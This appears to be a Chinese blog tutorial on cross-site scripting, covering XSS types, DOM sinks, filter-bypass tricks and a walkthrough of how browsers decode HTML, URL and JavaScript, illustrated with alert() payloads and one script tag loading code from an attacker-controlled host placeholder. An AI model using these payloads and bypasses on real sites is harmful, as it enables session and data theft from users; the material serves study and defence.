xss知识点总结

一，xss原理：

XSS 即（Cross Site Scripting）中文名称为：跨站脚本攻击。XSS的重点不在于跨站点，而在于脚本的执行。XSS的原理是：恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候，那么嵌入到web页面中script代码会执行，因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类：反射型、存储型、及 DOM-based型。反射性和DOM-baseed型可以归类为非持久性
XSS攻击。存储型可以归类为持久性XSS攻击。

反射型XSS

诱使用户点击一个恶意链接，才能攻击成功，即将用户输入的数据返回给浏览器，反射型XSS也叫做“非持久型XSS”

存储型XSS

将用户输入的数据存储到服务器端，这种XSS有很强的稳定性，所以也叫做持久型XSS。比如在一个页面里植入了恶意代码，访问到这个页面的所有人的浏览器都会执行这段恶意代码。

DOM Based XSS

通过修改页面的DOM节点形成的XSS

二，DOM型XSS常见的引发原因

利用的前提都是有可控参数

location.href

innerHTML,outerHTML

appendChild

doucument.write/writeln

eval

setTimeout

location.href="javascript:alert(1)";
var tmp = document.getElementsById('1');
tmp.innerHTML='<script>alert(1);</script>';
doucument.write('<script>alert(1);</scirpt>');
eval("alert(1);");
setTimeout(function(){alert(1);},1000);

三，HTML中可以执行js代码的地方

1，在`<script>`标签中执行js代码

这是最常用方法

<script> alert(1);</script>
<script src="http://<yourVPS>/xss.js"></script>

2，在HTML标签的属性中添加事件

不同标签支持的事件不同，很难全部记住。在找到xss的构造点后，可以到javascript event对象中查找可用的事件。一些可以自动触发的事件可以作为首选项，像onerror,onload等。

<img src="abc" onerror="alert(1);">
<input id="123" value="test" onblur="alert(1);">

3，在具有src,href属性的一些标签中执行js代码

<a href="javascript:alert(1);">aaaa</a>
<iframe src="javascript:alert(1);"></iframe>

四，xss常见的绕过方法

大小写绕过
双写绕过
替换绕过
- alert可用prompt,confirm,top['alert'](1)
- ()可用 ``代替
- 空格可用%0a,%0d,/**/; html的标签内分割两部分还可以用/
- 字符ſ(ord=383)转为大写为S
编码绕过
- url编码
- html实体
- javascript字符编码八进制\164 十六进制\x0074
js的String.fromCharCode方法获得字符串
注释绕过
- JavaScript注释 // /**/
- html注释  <!-- --!>
@符号绕过url限制http://test:test@www.baidu.com
宽字节绕过等

五，从 XSS Payload 学习浏览器解码

1，

<a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29"></a>

里面没有HTML编码内容，不考虑，其中href内部是URL，于是直接丢给URL模块处理，但是协议无法识别（即被编码的javascript:），解码失败，不会被执行

URL规定协议，用户名，密码都必须是ASCII，编码当然就无效了

2，

<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:%61%6c%65%72%74%28%32%29">

先HTML解码，得到

href中为URL，URL模块可识别为javascript协议，进行URL解码，得到

由于是javascript协议，解码完给JS模块处理，于是被执行

3，

<a href="javascript%3aalert(3)"></a>

同1，不解释

4，

<div>&#60;img src=x onerror=alert(4)&#62;</div>

这里包含了HTML编码内容，反过来以开发者的角度思考，HTML编码就是为了显示这些特殊字符，而不干扰正常的DOM解析，所以这里面的内容不会变成一个img元素，也不会被执行

从HTML解析机制看，在读取<div>之后进入数据状态，<会被HTML解码，但不会进入标签开始状态，当然也就不会创建img元素，也就不会执行

5，

<textarea>&#60;script&#62;alert(5)&#60;/script&#62;</textarea>

<textarea>是RCDATA元素（RCDATA elements），可以容纳文本和字符引用，注意不能容纳其他元素，HTML解码得到

<textarea><script>alert(5)</script></textarea>

于是直接显示

RCDATA`元素（RCDATA elements）包括`textarea`和`title

6，

<textarea><script>alert(6)</script></textarea>

和5一样

7，

<button onclick="confirm('7&#39;);">Button</button>

这里onclick中为标签的属性值（类比2中的href），会被HTML解码，得到

<button onclick="confirm('7');">Button</button>

然后执行

8，

<button onclick="confirm('8\u0027);">Button</button>

onclick中的值会交给JS处理，在JS中只有字符串和标识符能用Unicode表示，'显然不行，JS执行失败

9，

<script>&#97;&#108;&#101;&#114;&#116&#40;&#57;&#41;&#59</script>

script属于原始文本元素(Raw text elements)，只可以容纳文本，注意没有字符引用，于是直接由JS处理，JS也认不出来，执行失败

原始文本元素(Raw text elements)有<script>和<style>

10，

<script>\u0061\u006c\u0065\u0072\u0074(10);</script>

和8一样，函数名alert属于标识符，直接被JS执行

11，

<script>\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0031\u0029</script>

和8一样

12，

<script>\u0061\u006c\u0065\u0072\u0074(\u0031\u0032)</script>

这里看似将没毛病，但是这里\u0031\u0032在解码的时候会被解码为字符串12，注意是字符串，不是数字，文字显然是需要引号的，JS执行失败

13，

<script>alert('13\u0027)</script>

和8一样

14，

<script>alert('14\u000a')</script>

\u000a在JavaScript里是换行，就是\n，直接执行

15，

<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x31;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x36;&#x33;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x35;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x32;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x34;&#x28;&#x31;&#x35;&#x29;"></a>

先HTML解码，得到

在href中由URL模块处理，解码得到

javascript:\u0061\u006c\u0065\u0072\u0074(15)

识别JS协议，然后由JS模块处理，解码得到

javascript:alert(15)

最后被执行

总结

<script>和<style>数据只能有文本，不会有HTML解码和URL解码操作
<textarea>和<title>里会有HTML解码操作，但不会有子元素
其他元素数据（如div）和元素属性数据（如href）中会有HTML解码操作
部分属性（如href）会有URL解码操作，但URL中的协议需为ASCII
JavaScript会对字符串和标识符Unicode解码

六，HTML解析

从XSS的角度来说，我们感兴趣的是HTML文档是如何被词法解析的，因为我们并不想让用户提供的数据最终被解析为一段可执行脚本的script标签。HTML词法解析细则在(http://www.whatwg.org/specs/web-apps/current-work/multipage/tokenization.html)。HTML词法解析细则是一篇冗长的文档，这篇博文并不会覆盖它的所有内容。这篇博文只会覆盖有关文档解码如何结束，以及新token何时被创建这两个有趣的部分。<input value="dasdsad">dadasdsadadsa

一个HTML解析器作为一个状态机，它从输入流中获取字符并按照转换规则转换到另一种状态。在解析过程中，任何时候它只要遇到一个'<'符号（后面没有跟'/'符号）就会进入“标签开始状态(Tag openstate)”。然后转变到“标签名状态(Tag name state)”，“前属性名状态(before attribute name state)”......最后进入“数据状态(Data state)”并释放当前标签的token。当解析器处于“数据状态(Data state)”时，它会继续解析，每当发现一个完整的标签，就会释放出一个token。

这里有三种情况可以容纳字符实体，“数据状态中的字符引用”，“RCDATA状态中的字符引用”和“属性值状态中的字符引用”。在这些状态中HTML字符实体将会从“&#...”形式解码，对应的解码字符会被放入数据缓冲区中。例如，在问题4中，“<”和“>”字符被编码为“&#60”和“&#62”。当解析器解析完“<div>”并处于“数据状态”时，这两个字符将会被解析。当解析器遇到“&”字符，它会知道这是“数据状态的字符引用”，因此会消耗一个字符引用（例如“&#60”）并释放出对应字符的token。在这个例子中，对应字符指的是“<”和“>”。读者可能会想：这是不是意味着“<”和“>”的token将会被理解为标签的开始和结束，然后其中的脚本会被执行？答案是脚本并不会被执行。原因是解析器在解析这个字符引用后不会转换到“标签开始状态”。正因为如此，就不会建立新标签。因此，我们能够利用字符实体编码这个行为来转义用户输入的数据从而确保用户输入的数据只能被解析成“数据”。

字符实体(character entities)

字符实体是一个转义序列，它定义了一般无法在文本内容中输入的单个字符或符号。一个字符实体以一个&符号开始，后面跟着一个预定义的实体的名称，或是一个#符号以及字符的十进制数字。

HTML字符实体(HTML character entities)

在HTML中，某些字符是预留的。例如在HTML中不能使用“<”或“>”，这是因为浏览器可能误认为它们是标签的开始或结束。如果希望正确地显示预留字符，就需要在HTML中使用对应的字符实体。一个HTML字符实体描述如下：

需要注意的是，某些字符没有实体名称，但可以有实体编号。

字符引用（character references）

字符引用包括“字符值引用”和“字符实体引用”。在上述HTML例子中，'<'对应的字符值引用为'&#60'，对应的字符实体引用为‘&lt’。字符实体引用也被叫做“实体引用”或“实体”。）

现在你大概会明白为什么我们要转义“<”、“>”、“'” (单引号)和“"” (双引号)字符了。

这里要提一下RCDATA的概念。要了解什么是RCDATA，我们先要了解另一个概念。在HTML中有五类元素：

空元素(Void elements)，如<area>, ,<base>等等
原始文本元素(Raw text elements)，有<script>和<style>
RCDATA元素(RCDATA elements)，有<textarea>和<title>
外部元素(Foreign elements)，例如MathML命名空间或者SVG命名空间的元素
基本元素(Normal elements)，即除了以上4种元素以外的元素

五类元素的区别如下：

空元素，不能容纳任何内容（因为它们没有闭合标签，没有内容能够放在开始标签和闭合标签中间）。
原始文本元素，可以容纳文本。
RCDATA元素，可以容纳文本和字符引用。
外部元素，可以容纳文本、字符引用、CDATA段、其他元素和注释
基本元素，可以容纳文本、字符引用、其他元素和注释

如果我们回头看HTML解析器的规则，其中有一种可以容纳字符引用的情况是“RCDATA状态中的字符引用”。这意味着在<textarea>和<title>标签中的字符引用会被HTML解析器解码。这里要再提醒一次，在解析这些字符引用的过程中不会进入“标签开始状态”。这样就可以解释问题5了。另外，对RCDATA有个特殊的情况。在浏览器解析RCDATA元素的过程中，解析器会进入“RCDATA状态”。在这个状态中，如果遇到“<”字符，它会转换到“RCDATA小于号状态”。如果“<”字符后没有紧跟着“/”和对应的标签名，解析器会转换回“RCDATA状态”。这意味着在RCDATA元素标签的内容中（例如<textarea>或<title>的内容中），唯一能够被解析器认做是标签的就是“</textarea>”或者“</title>”。因此，在“<textarea>”和“<title>”的内容中不会创建标签，就不会有脚本能够执行。这也就解释了为什么问题6中的脚本不会被执行。

七，URL解析

URL解析器也是一个状态机模型，从输入流中进来的字符可以引导URL解析器转换到不同的状态。解析器的解析细则在(http://url.spec.whatwg.org/)。其中有很多有关安全或XSS转义的内容。

首先，URL资源类型必须是ASCII字母（U+0041-U+005A || U+0061-U+007A），不然就会进入“无类型”状态。例如，你不能对协议类型进行任何的编码操作，不然URL解析器会认为它无类型。这就是为什么问题1中的代码不能被执行。因为URL中被编码的“javascript”没有被解码，因此不会被URL解析器识别。该原则对协议后面的“：”（冒号）同样适用，即问题3也得到解答。然而，你可能会想到：为什么问题2中的脚本被执行了呢？如果你记得我们在HTML解析部分讨论的内容的话，是否还记得有一个情况叫做“属性值中的字符引用”，在这个情况中字符引用会被解码。我们将稍后讨论解析顺序，但在这里，HTML解析器解析了文档，创建了标签token，并且对href属性里的字符实体进行了解码。然后，当HTML解析器工作完成后，URL解析器开始解析href属性值里的链接。在这时，“javascript”协议已经被解码，它能够被URL解析器正确识别。然后URL解析器继续解析链接剩下的部分。由于是“javascript”协议，JavaScript解析器开始工作并执行这段代码，这就是为什么问题2中的代码能够被执行。

html->url->javascript

其次，URL编码过程使用UTF-8编码类型来编码每一个字符。如果你尝试着将URL链接做了其他编码类型的编码，URL解析器就可能不会正确识别。

八，JavaScript 解析

JavaScript解析过程与HTML解析过程有点不一样。JavaScript语言是一门内容无关语言。对应着有一份内容无关的语法来描述它。我们可以利用内容无关语法来解释JavaScript是如何解析的。ECMAScript-262细则在(http://www.ecma-international.org/publications/standards/Ecma-262.htm)，语法文件在(http://www.antlr3.org/grammar/1206736738015/JavaScript.g)。

这里有一些与安全相关的事情：字符是如何被解码的？对一些字符进行转义是否有效？

开始之前，让我们来回到HTML解析过程中的“原始文本”元素。我故意将HTML中的一部分留到这个章节是因为它与JavaScript解析有关。所有的“script”块都属于“原始文本”元素。“script”块有个有趣的属性：在块中的字符引用并不会被解析和解码。如果你去看“脚本数据状态”的状态转换规则，就会发现没有任何规则能转移到字符引用状态。这意味着什么？这意味着问题9中的脚本并不会执行。所以如果攻击者尝试着将输入数据编码成字符实体并将其放在script块中，它将不会被执行。

那像“\uXXXX”（例如\u0000,\u000A）这样的字符呢，JavaScript会解析这些字符来执行吗？简单的说：视情况而定。具体的说就是要看被编码的序列到底是哪部分。首先，像\uXXXX一样的字符被称作Unicode转义序列。从上下文来看，你可以将转义序列放在3个部分：字符串中，标识符名称中和控制字符中。

字符串中：当Unicode转义序列存在于字符串中时，它只会被解释为正规字符，而不是单引号，双引号或者换行符这些能够打破字符串上下文的字符。这项内容清楚地写在ECMAScript中。因此，Unicode转义序列将永远不会破环字符串上下文，因为它们只能被解释成字符串常量。

“ECMAScript 与 JAVA 编程语言在对待Unicode转义序列时的行为不同。在Java程序中，如果Unicode转义序列\u000A出现在单行字符串注释中，它会被解释为行结束符（换行符），因此会导致接下来的Unicode字符不是注释的一部分。同样的，如果Unicode转义序列\u000A出现在Java程序的字符串常量中，它同样会被解释为行结束符（换行符），这在字符串常量中是不被允许的——如果需要在字符串常量中表示换行，需要用\n来代替\u000A。在ECMAScript程序中，出现在注释中的Unicode转义序列永远不会被解释，因此不会导致注释换行问题。同样地，ECMAScript程序中，在字符串常量中出现的Unicode转义序列会被当作字符串常量中的一个Unicode字符，并且不会被解释成有可能结束字符串常量的换行符或者引号。”

<script>
   alert(1) 
</script>

标识符名称中：当Unicode转义序列出现在标识符名称中时，它会被解码并解释为标识符名称的一部分，例如函数名，属性名等等。这可以用来解释问题10。如果我们深入研究JavaScript细则，可以看到如下内容：

“Unicode转义序列（如\u000A\u000B）同样被允许用在标识符名称中，被当作名称中的一个字符。而将''符号前置在Unicode转义序列串（如\u000A000B000C）并不能作为标识符名称中的字符。将Unicode转义序列串放在标识符名称中是非法的。”

控制字符:当用Unicode转义序列来表示一个控制字符时，例如单引号、双引号、圆括号等等，它们将不会被解释成控制字符，而仅仅被解码并解析为标识符名称或者字符串常量。如果你去看ECMAScript的语法，就会发现没有一处会用Unicode转义序列来当作控制字符。例如，如果解析器正在解析一个函数调用语句，圆括号部分必须为“(”和“)”，而不能是\u0028和\u0029。

总的来说，Unicode转义序列只有在标识符名称里不被当作字符串，也只有在标识符名称里的编码字符能够被正常的解析。如果我们回看问题11，它并不会被执行。因为“(11)”不会被正确的解析，而“alert(11)”也不是一个有效的标识符名称。问题12不会被正确执行要么是因为'\u0031\u0032'不会被解释为字符串常量（因为它们没有用引号闭合）要么是因为它们是ASCII型数字。问题13不会执行的原因是'\u0027'仅仅会被解释成单引号文本，而此时字符串是未闭合的。问题14能够执行的原因是'\u000a'会被解释成换行符文本，这并不会导致真正的换行从而引发JavaScript语法错误。

posted on 2022-07-26 14:22 {轩} 阅读(1451) 评论(0) 编辑收藏举报

xss知识点总结

二，DOM型XSS常见的引发原因

三，HTML中可以执行js代码的地方

1，在`<script>`标签中执行js代码

2，在HTML标签的属性中添加事件

3，在具有src,href属性的一些标签中执行js代码

五，从 XSS Payload 学习浏览器解码

搜索

常用链接

随笔档案

阅读排行榜

xss知识点总结

二，DOM型XSS常见的引发原因

三，HTML中可以执行js代码的地方

1，在<script>标签中执行js代码

2，在HTML标签的属性中添加事件

3，在具有src,href属性的一些标签中执行js代码

五，从 XSS Payload 学习浏览器解码

搜索

常用链接

随笔档案

阅读排行榜

1，在`<script>`标签中执行js代码